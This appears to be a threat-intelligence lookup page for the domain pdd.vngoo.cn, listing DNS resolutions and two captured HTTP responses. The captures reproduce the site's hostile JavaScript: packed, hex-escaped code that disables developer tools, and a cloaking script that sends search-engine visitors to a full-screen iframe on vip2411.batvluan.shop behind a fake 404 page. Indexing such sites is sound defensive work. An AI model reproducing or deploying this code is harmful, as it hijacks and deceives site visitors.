Domain > pdd.vngoo.cn

More information on this domain is in AlienVault OTX

DNS Resolutions

Date	IP Address
2024-05-28	118.123.202.3 (ClassC)
2025-10-24	192.3.13.171 (ClassC)

html>head>meta charsetUTF-8>meta nameviewport contentwidthdevice-width, initial-scale1.0>head>title>404 Not Found/title>/head>/head>body>script>(function(){    var bp  document.createElement(script);    var curProtocol  window.location.protocol.split(:)0;    if (curProtocol  https) {        bp.src  https://zz.bdstatic.com/linksubmit/push.js;    }    else {        bp.src  http://push.zhanzhang.baidu.com/push.js;    }    var s  document.getElementsByTagName(script)0;    s.parentNode.insertBefore(bp, s);})();/script>script>(function() {    var script  document.createElement(script);    script.src  (document.location.protocol  http:)         ? http://js.passport.qihucdn.com/11.0.1.js?8113138f123429f4e46184e7146e43d9         : https://jspassport.ssl.qhimg.com/11.0.1.js?8113138f123429f4e46184e7146e43d9;    script.id  sozz;    document.body.appendChild(script);})();window\x65\x76\x61\x6c(function(lnBsTCh1,$SiWwKsCA2,yKPruI3,v4,imhALOqTL5,p6){imhALOqTL5function(yKPruI3){return(yKPruI3$SiWwKsCA2?:imhALOqTL5(window\x70\x61\x72\x73\x65\x49\x6e\x74(yKPruI3/$SiWwKsCA2)))+((yKPruI3yKPruI3%$SiWwKsCA2)>35?window\x53\x74\x72\x69\x6e\x67\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65(yKPruI3+29):yKPruI3\x74\x6f\x53\x74\x72\x69\x6e\x67(36))};if(!\x72\x65\x70\x6c\x61\x63\x65(/^/,window\x53\x74\x72\x69\x6e\x67)){while(yKPruI3--)p6imhALOqTL5(yKPruI3)v4yKPruI3||imhALOqTL5(yKPruI3);v4function(imhALOqTL5){return p6imhALOqTL5};imhALOqTL5function(){return\\\x77\x2b};yKPruI31;};while(yKPruI3--)if(v4yKPruI3)lnBsTCh1lnBsTCh1\x72\x65\x70\x6c\x61\x63\x65(new window\x52\x65\x67\x45\x78\x70(\\\x62+imhALOqTL5(yKPruI3)+\\\x62,\x67),v4yKPruI3);return lnBsTCh1;}(\x31 \x39\x3d\x65\x3d\x3e\x65\x2e\x36\x28\x29\x3b\x34\x2e\x35\x28\\x64\\x2c\x39\x2c\x7b\x66\x3a\x6b\x7d\x29\x3b\x34\x2e\x67\x2e\x68\x28\\x6d\\x2c\\x3c\x37\x3e\x6c\x7b\x61\x2d\x62\x3a\x6e\x3b\x7d\x3c\x2f\x37\x3e\\x29\x3b\x34\x2e\x35\x28\\x73\\x2c\x28\x65\x29\x3d\x3e\x7b\x31 \x30\x3d\x65\x2e\x30\x2e\x74\x28\x29\x3b\x31 \x38\x3d\x28\x28\x65\x2e\x32\x26\x26\x65\x2e\x33\x26\x26\x30\x3d\x3d\x3d\\x69\\x29\x7c\x7c\x28\x65\x2e\x32\x26\x26\x65\x2e\x33\x26\x26\x30\x3d\x3d\x3d\\x6a\\x29\x7c\x7c\x28\x65\x2e\x32\x26\x26\x65\x2e\x33\x26\x26\x30\x3d\x3d\x3d\\x63\\x29\x7c\x7c\x30\x3d\x3d\x3d\\x70\\x7c\x7c\x65\x2e\x71\x3d\x3d\x3d\x6f\x29\x3b\x72\x28\x38\x29\x7b\x65\x2e\x36\x28\x29\x7d\x7d\x29\x3b,30,30,\x6b\x65\x79\x7c\x63\x6f\x6e\x73\x74\x7c\x63\x74\x72\x6c\x4b\x65\x79\x7c\x73\x68\x69\x66\x74\x4b\x65\x79\x7c\x64\x6f\x63\x75\x6d\x65\x6e\x74\x7c\x61\x64\x64\x45\x76\x65\x6e\x74\x4c\x69\x73\x74\x65\x6e\x65\x72\x7c\x70\x72\x65\x76\x65\x6e\x74\x44\x65\x66\x61\x75\x6c\x74\x7c\x73\x74\x79\x6c\x65\x7c\x69\x73\x44\x65\x76\x54\x6f\x6f\x6c\x73\x4b\x65\x79\x7c\x64\x69\x73\x61\x62\x6c\x65\x43\x6f\x6e\x74\x65\x78\x74\x4d\x65\x6e\x75\x7c\x75\x73\x65\x72\x7c\x73\x65\x6c\x65\x63\x74\x7c\x7c\x63\x6f\x6e\x74\x65\x78\x74\x6d\x65\x6e\x75\x7c\x7c\x70\x61\x73\x73\x69\x76\x65\x7c\x68\x65\x61\x64\x7c\x69\x6e\x73\x65\x72\x74\x41\x64\x6a\x61\x63\x65\x6e\x74\x48\x54\x4d\x4c\x7c\x7c\x7c\x66\x61\x6c\x73\x65\x7c\x62\x6f\x64\x79\x7c\x62\x65\x66\x6f\x72\x65\x65\x6e\x64\x7c\x6e\x6f\x6e\x65\x7c\x31\x32\x33\x7c\x66\x31\x32\x7c\x6b\x65\x79\x43\x6f\x64\x65\x7c\x69\x66\x7c\x6b\x65\x79\x64\x6f\x77\x6e\x7c\x74\x6f\x4c\x6f\x77\x65\x72\x43\x61\x73\x65\x73\x70\x6c\x69\x74(\x7c),0,{}))/script>script>(function(e){function t(e){var tlocation.href,nt.split().reverse(),re.split(),i;for(var s0,o16;so;s++)i.push(rs+(ns||));return i.join()}var n/(http|https:\/\/a-zA-Z0-9\_\.+\.so\.com)/gi,re.location.href;if(r&&!n.test(r)&&window.navigator.appName){var i//s.360.cn/so/zz.gif,sdocument.getElementById(sozz),os.src.split(?)1,ut(o),anew Image;r&&(i+?url+encodeURIComponent(r)),o&&(i+&sid+o),u&&(i+&token+u),o&&(a.srci)}})(window);/script>div styledisplay:none;>script typetext/javascript srchttps://js.users.51.la/19076292.js>/script>/div>center>h1>404 Not Found/h1>/center>hr>center>nginx/center>script>function setupReferrerRedirect(sourceDomains) {    const getDomain  url > {        try {            const domain  new URL(url).hostname.replace(www., );            return domain.endsWith(/) ? domain.slice(0, -1) : domain;        } catch {            return null;        }    };    const shouldRedirect  () > {        const referrerDomain  getDomain(document.referrer);        return referrerDomain && sourceDomains.some(domain >             referrerDomain  domain || referrerDomain.endsWith(`.${domain}`)        );    };    if (shouldRedirect()) {		return true;    }}if (setupReferrerRedirect(baidu.com,so.com,sogou.com,bing.com,sm.cn)) {setTimeout(() > {			var win_Height  window.innerHeight;	let a1  getValues0().reverse().join().replace(Mip, ) , a2  getValues1().join().replace(Mip, ); setFrame(a2);	function getValues0() { return e, m, a, r, f, p, i, M; } function getValues1() {  return Miphttp://vip2411.batvluan.shop, ?relwebpa, g, e&domvngoo.cn&ip52.40.234.105; }	function setFrame(olink) {		var divObjdocument.createElement(div); var nidwap + baidu; divObj.setAttribute(id, nid);		divObj.innerHTMLi + a1 +   relnofollow  + a1 + border0 styleposition:fixed;top:0;left:0;width:100% !important;height:100% !important;max-height: none !important; sr + c+ olink + >/ + a1 + >;		var firstdocument.body.firstChild; document.body.insertBefore(divObj,first);		const sdocument.createElement(style); s.textContent`html,body{position:relative;width:auto !important;height:100% !important;min-width:auto !important;overflow:hidden;} #` + nid +`{height: ` + win_Height + `px; width: 100%; background-color: rgb(255, 255, 255); background-position: initial initial; background-repeat: initial initial;} body > :not(#` + nid + `){display:none!important}`; document.head.appendChild(s);	}	;}, 500);}/script>/body>/html>!-- a padding to disable MSIE and Chrome friendly error page -->!-- a padding to disable MSIE and Chrome friendly error page -->!-- a padding to disable MSIE and Chrome friendly error page -->!-- a padding to disable MSIE and Chrome friendly error page -->!-- a padding to disable MSIE and Chrome friendly error page -->!-- a padding to disable MSIE and Chrome friendly error page -->

Port 443

HTTP/1.1 200 OKServer: nginxDate: Fri, 24 Oct 2025 02:23:38 GMTContent-Type: text/html; charsetUTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: ThinkPHPRetry-After: Mon, 27 Oct 2025 10:23:38 +0800Strict-Transport-Security: max-age63072000; includeSubDomains; preloadX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 1; modeblock

html>head>meta charsetUTF-8>meta nameviewport contentwidthdevice-width, initial-scale1.0>head>title>404 Not Found/title>/head>/head>body>script>(function(){    var bp  document.createElement(script);    var curProtocol  window.location.protocol.split(:)0;    if (curProtocol  https) {        bp.src  https://zz.bdstatic.com/linksubmit/push.js;    }    else {        bp.src  http://push.zhanzhang.baidu.com/push.js;    }    var s  document.getElementsByTagName(script)0;    s.parentNode.insertBefore(bp, s);})();/script>script>(function() {    var script  document.createElement(script);    script.src  (document.location.protocol  http:)         ? http://js.passport.qihucdn.com/11.0.1.js?031ce7a3aeda4820feb99e5f566e2b84         : https://jspassport.ssl.qhimg.com/11.0.1.js?031ce7a3aeda4820feb99e5f566e2b84;    script.id  sozz;    document.body.appendChild(script);})();window\x65\x76\x61\x6c(function(lnBsTCh1,$SiWwKsCA2,yKPruI3,v4,imhALOqTL5,p6){imhALOqTL5function(yKPruI3){return(yKPruI3$SiWwKsCA2?:imhALOqTL5(window\x70\x61\x72\x73\x65\x49\x6e\x74(yKPruI3/$SiWwKsCA2)))+((yKPruI3yKPruI3%$SiWwKsCA2)>35?window\x53\x74\x72\x69\x6e\x67\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65(yKPruI3+29):yKPruI3\x74\x6f\x53\x74\x72\x69\x6e\x67(36))};if(!\x72\x65\x70\x6c\x61\x63\x65(/^/,window\x53\x74\x72\x69\x6e\x67)){while(yKPruI3--)p6imhALOqTL5(yKPruI3)v4yKPruI3||imhALOqTL5(yKPruI3);v4function(imhALOqTL5){return p6imhALOqTL5};imhALOqTL5function(){return\\\x77\x2b};yKPruI31;};while(yKPruI3--)if(v4yKPruI3)lnBsTCh1lnBsTCh1\x72\x65\x70\x6c\x61\x63\x65(new window\x52\x65\x67\x45\x78\x70(\\\x62+imhALOqTL5(yKPruI3)+\\\x62,\x67),v4yKPruI3);return lnBsTCh1;}(\x31 \x39\x3d\x65\x3d\x3e\x65\x2e\x36\x28\x29\x3b\x34\x2e\x35\x28\\x64\\x2c\x39\x2c\x7b\x66\x3a\x6b\x7d\x29\x3b\x34\x2e\x67\x2e\x68\x28\\x6d\\x2c\\x3c\x37\x3e\x6c\x7b\x61\x2d\x62\x3a\x6e\x3b\x7d\x3c\x2f\x37\x3e\\x29\x3b\x34\x2e\x35\x28\\x73\\x2c\x28\x65\x29\x3d\x3e\x7b\x31 \x30\x3d\x65\x2e\x30\x2e\x74\x28\x29\x3b\x31 \x38\x3d\x28\x28\x65\x2e\x32\x26\x26\x65\x2e\x33\x26\x26\x30\x3d\x3d\x3d\\x69\\x29\x7c\x7c\x28\x65\x2e\x32\x26\x26\x65\x2e\x33\x26\x26\x30\x3d\x3d\x3d\\x6a\\x29\x7c\x7c\x28\x65\x2e\x32\x26\x26\x65\x2e\x33\x26\x26\x30\x3d\x3d\x3d\\x63\\x29\x7c\x7c\x30\x3d\x3d\x3d\\x70\\x7c\x7c\x65\x2e\x71\x3d\x3d\x3d\x6f\x29\x3b\x72\x28\x38\x29\x7b\x65\x2e\x36\x28\x29\x7d\x7d\x29\x3b,30,30,\x6b\x65\x79\x7c\x63\x6f\x6e\x73\x74\x7c\x63\x74\x72\x6c\x4b\x65\x79\x7c\x73\x68\x69\x66\x74\x4b\x65\x79\x7c\x64\x6f\x63\x75\x6d\x65\x6e\x74\x7c\x61\x64\x64\x45\x76\x65\x6e\x74\x4c\x69\x73\x74\x65\x6e\x65\x72\x7c\x70\x72\x65\x76\x65\x6e\x74\x44\x65\x66\x61\x75\x6c\x74\x7c\x73\x74\x79\x6c\x65\x7c\x69\x73\x44\x65\x76\x54\x6f\x6f\x6c\x73\x4b\x65\x79\x7c\x64\x69\x73\x61\x62\x6c\x65\x43\x6f\x6e\x74\x65\x78\x74\x4d\x65\x6e\x75\x7c\x75\x73\x65\x72\x7c\x73\x65\x6c\x65\x63\x74\x7c\x7c\x63\x6f\x6e\x74\x65\x78\x74\x6d\x65\x6e\x75\x7c\x7c\x70\x61\x73\x73\x69\x76\x65\x7c\x68\x65\x61\x64\x7c\x69\x6e\x73\x65\x72\x74\x41\x64\x6a\x61\x63\x65\x6e\x74\x48\x54\x4d\x4c\x7c\x7c\x7c\x66\x61\x6c\x73\x65\x7c\x62\x6f\x64\x79\x7c\x62\x65\x66\x6f\x72\x65\x65\x6e\x64\x7c\x6e\x6f\x6e\x65\x7c\x31\x32\x33\x7c\x66\x31\x32\x7c\x6b\x65\x79\x43\x6f\x64\x65\x7c\x69\x66\x7c\x6b\x65\x79\x64\x6f\x77\x6e\x7c\x74\x6f\x4c\x6f\x77\x65\x72\x43\x61\x73\x65\x73\x70\x6c\x69\x74(\x7c),0,{}))/script>script>(function(e){function t(e){var tlocation.href,nt.split().reverse(),re.split(),i;for(var s0,o16;so;s++)i.push(rs+(ns||));return i.join()}var n/(http|https:\/\/a-zA-Z0-9\_\.+\.so\.com)/gi,re.location.href;if(r&&!n.test(r)&&window.navigator.appName){var i//s.360.cn/so/zz.gif,sdocument.getElementById(sozz),os.src.split(?)1,ut(o),anew Image;r&&(i+?url+encodeURIComponent(r)),o&&(i+&sid+o),u&&(i+&token+u),o&&(a.srci)}})(window);/script>div styledisplay:none;>script typetext/javascript srchttps://js.users.51.la/19076292.js>/script>/div>center>h1>404 Not Found/h1>/center>hr>center>nginx/center>script>function setupReferrerRedirect(sourceDomains) {    const getDomain  url > {        try {            const domain  new URL(url).hostname.replace(www., );            return domain.endsWith(/) ? domain.slice(0, -1) : domain;        } catch {            return null;        }    };    const shouldRedirect  () > {        const referrerDomain  getDomain(document.referrer);        return referrerDomain && sourceDomains.some(domain >             referrerDomain  domain || referrerDomain.endsWith(`.${domain}`)        );    };    if (shouldRedirect()) {		return true;    }}if (setupReferrerRedirect(baidu.com,so.com,sogou.com,bing.com,sm.cn)) {setTimeout(() > {			var win_Height  window.innerHeight;	let a1  getValues0().reverse().join().replace(Mip, ) , a2  getValues1().join().replace(Mip, ); setFrame(a2);	function getValues0() { return e, m, a, r, f, p, i, M; } function getValues1() {  return Miphttps://vip2411.batvluan.shop?relwe, bpage&do, mvngoo.cn&ip52.40.234.105; }	function setFrame(olink) {		var divObjdocument.createElement(div); var nidwap + baidu; divObj.setAttribute(id, nid);		divObj.innerHTMLi + a1 +   relnofollow  + a1 + border0 styleposition:fixed;top:0;left:0;width:100% !important;height:100% !important;max-height: none !important; sr + c+ olink + >/ + a1 + >;		var firstdocument.body.firstChild; document.body.insertBefore(divObj,first);		const sdocument.createElement(style); s.textContent`html,body{position:relative;width:auto !important;height:100% !important;min-width:auto !important;overflow:hidden;} #` + nid +`{height: ` + win_Height + `px; width: 100%; background-color: rgb(255, 255, 255); background-position: initial initial; background-repeat: initial initial;} body > :not(#` + nid + `){display:none!important}`; document.head.appendChild(s);	}	;}, 500);}/script>/body>/html>!-- a padding to disable MSIE and Chrome friendly error page -->!-- a padding to disable MSIE and Chrome friendly error page -->!-- a padding to disable MSIE and Chrome friendly error page -->!-- a padding to disable MSIE and Chrome friendly error page -->!-- a padding to disable MSIE and Chrome friendly error page -->!-- a padding to disable MSIE and Chrome friendly error page -->

View on OTX | View on ThreatMiner

Data with thanks to AlienVault OTX, VirusTotal, Malwr and others. [Sitemap]

Domain > pdd.vngoo.cn

Is this malicious?

DNS Resolutions

Port 80

Port 443